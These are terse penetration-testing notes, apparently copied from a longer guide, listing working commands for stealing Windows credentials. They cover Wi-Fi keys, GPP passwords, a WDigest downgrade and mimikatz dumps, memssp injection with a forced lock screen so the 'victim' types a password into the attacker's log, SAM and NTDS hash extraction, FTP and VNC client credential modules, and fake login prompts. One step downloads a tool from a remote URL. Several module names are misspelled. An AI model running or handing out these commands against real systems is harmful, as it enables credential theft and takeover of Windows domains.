C:/ProgramData\Microsoft/Wlansvc\Profiles\Interfaces*** (in xml file)
get names with
netsh wlan show profiles
then
netsh wlan show profile name=<SSID NAME> key=clear
password will be in "Key Content: " parameter
lazagne.exe wifi
in meterpreter>
getsystem
load kiwi
wifi_list_shared
use post/windows/wlan/wlan_profile
Config file stored in.. \\SYSVOL<DOMAIN>\Policies
on win server, create new group policy object under Domain Admin (Group Policy Management) create new user account via Computer Configuration > ontrol Panel settings > Local users and groups then right click > Local users and groups > New > local user dont forgetti > run gpupdate
Doing Same thing in MSF aux/scanner/smb/smb_enum_gpp
rhosts, smbuser, smbpass, run or post/windows/gather/credentials/gpp another way
smbclient //<IP>/SYSVOL -U <user>then you can find groups.xml at file:\sysvol\sysvol<box.local>\Policies<NUMBER>\machine\preferences\groups\groups.xmlgpp-decrypt <hash>orGP3finder.exe -Dor
powershell-empire
agents
use module privesc/gpp
execute
or
Import-Module \Get-GPPPassword.ps1
Get-GPPPassword
shell wget <URL>/lazagne.exe
shell wget
shell dir
shell ./lazagne.exe all
authenticate and it will tell you all passwords
load powershell
powershell_import /root/Get-WebCredentials.ps1
powershell_execute Get-WebCredentials
> mimikatz
privilege::debug
sekrusla::wdigest
if not active, create UseLogonCredential : 1 in registry by..:
reg add
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest /v UseLogonCredential /t REG_DWORD /d 1
gpupdate
privilege:;debug
sekurlsa:;wdigest
Import-Module .\WdigestDowngrade.ps1
Invoke-WdigestDowngrade
reg query
then get invoke-mimikatz.ps1 from powersploit
Invoke-Mimikatz -DumpCreds
reg enumkey -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest
load powershell
powershell_import /root/Desktop/Invoke-WdigestDowngrade.ps1
powershell_execute Invoke-WDigestDowngrade
powershell_import InvokeMimikatz.ps1
powershell_execute Invoke-Mimikatz -CredsDump
use post/windows/manage/wdigest_caching`
load kiwi
creds_wdigest
usemodule management/wdigest_downgrade*
run
usemodule credentials/mimikatz/command*
set Command sekurlsa::wdigest
run
crackmapexec smb <IP> -u "Administrator" -p "sweetpasswd" -M wdigest -o ACTION=enable
config at: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security
check for security packages via PS
reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
add it with:
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mim ilib" /t REG_MULTI_SZ /f
after reboot this file will be created
type C:\Windows\System32\kiwissp.log
mimikatz to dump em
privilege::debug
misc::memssp
check log
type C:\Windows\System32\mimilsa.log
in msf
load kiwi
kiwi_cmd misc::memssp
now engage lock screen so victim will have to write creds into our log
shell
RunDll32.exe user32.dll,LockWorkStation
via koadic also has mimikatz functionality, once you have a session
use mimikatz_dynwrapx
set MIMICMD misc::memssp
cmdshell 0
RunDll32.exe user32.dll,LockWorkStation
type mimilsa.log
in empire
usemodule persistence/misc/memssp
execute
usemodule management/lock
execute
type C:\Windows\System32\mimilsa.log
normal way just use updog, upload mimikatz.exe, run same commands
SAM is found in C:\Windows\System32\config
or in registry
HKEY_LOCAL_MACHINE\SAM.
or get SAM and extract
PwDump7.exe
reg save hklm\sam c:\sam
reg save hklm\system
c:\system
or samdump2
samdump2 system sam
Download Invoke-Powerdump Script
MSF + PS
powershell_import /root/powershell/Invoke-PowerDump.ps1
powershell_execute Invoke-PowerDump
another way
powershell_import /root/powershell/Get-PassHashes.ps1
powershell_execute Get-PassHashes
Download Invoke-Powerdump Script
### This method is an excellent one for local testing, AKA internal testing. To use this method, simply type the following in the Powershell:
Import-Module <'path of the powerdump script'> Invoke-PowerDump
via mimikatz
privilege::debug
token::elevate
lsadump::sam
Impacket
./secretsdump.py -sam /root/Desktop/sam -
system /root/Desktop/system LOCAL
MSF
use post/windows/gather/hashdump
or
use post/windows/gather/credential/credential_collector
or
load_kiwi
lsa_dump_sam
KOADIC
use hashdump_sam
EMPIRE
usemodule credentials/mimikatz/sam*
Lazagne
lazagne.exe all
CME
crackmapexec smb [IP Address] -u ‘[Username]’ -p ‘[Password]’ –sam crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --sam
then
john –format=NT hash –show
empire
usemodule credentials/sessiongopher
via coreFTP server
pass at: HKEY_CURRENT_USER\SOFTWARE\FTPWare\CoreFTP\Sites
msf: use post/windows/gather/credentials/coreftp
FTP Navigator
use post/windows/gather/credetnials/ftpnavigator
FILEZILLA
use post/multi/gather/filezilla_client_cred
HIEDI SQL
use post/windows/gather/creddtnitals/heidisql
also modules for
VNC
WINSCP
many more
NTDS file at “C:\Windows\NTDS”
dump via: fgdump.exe
or
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
./secretsdump.py -ntds /root/ntds.dit -system
/root/SYSTEM LOCAL
with PS
Save-Module DSInternals -Path
C:\Windows\System32\WindowsPowershell\v1.0\Modules
Set-ExecutionPolicy Unrestricted
Import-Module DSInternals
Get-BootKey -SystemHivePath 'C:\SYSTEM'
Get-ADDBAccount -All -DBPath 'C:\ntds.dit' -Bootkey <bootkey value>
with ntdsdumper.exe
NTDSDumpEx.exe -d C:\ntds.dit -s
C:\SYSTEM
with msf
use post/windows/gather/ntds_location
or
use post/windows/gather/ntds_grabber
or
cabextract <cab filename>
use auxiliary/scanner/smb/impacket/secretsdump
set rhosts 192.168.1.108
set smbuser administrator
set smbpass Ignite@987
exploit
cme
crackmapexec smb [IP Address] -u ‘[Username]’ -p ‘[Password]’ -ntds drsuapi crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --ntds drsuapi
john --format=NT hash --show
use post/windows/gather/phish_windows_credentials
Fakelogonscreen.exe
sharplocker.exe
EMPIRE
usemodule collection/toasted
KOADIC:
use password_box
execute
PS
Import-Module C:\Users\raj\Desktop\Invoke-CredentialsPhish.ps1
Import-Module C:\Users\raj\Desktop\Invoke-LoginPrompt.ps1
Invoke-LoginPrompt.ps1
lockphish.sh
<ENDED AT PAGE 103>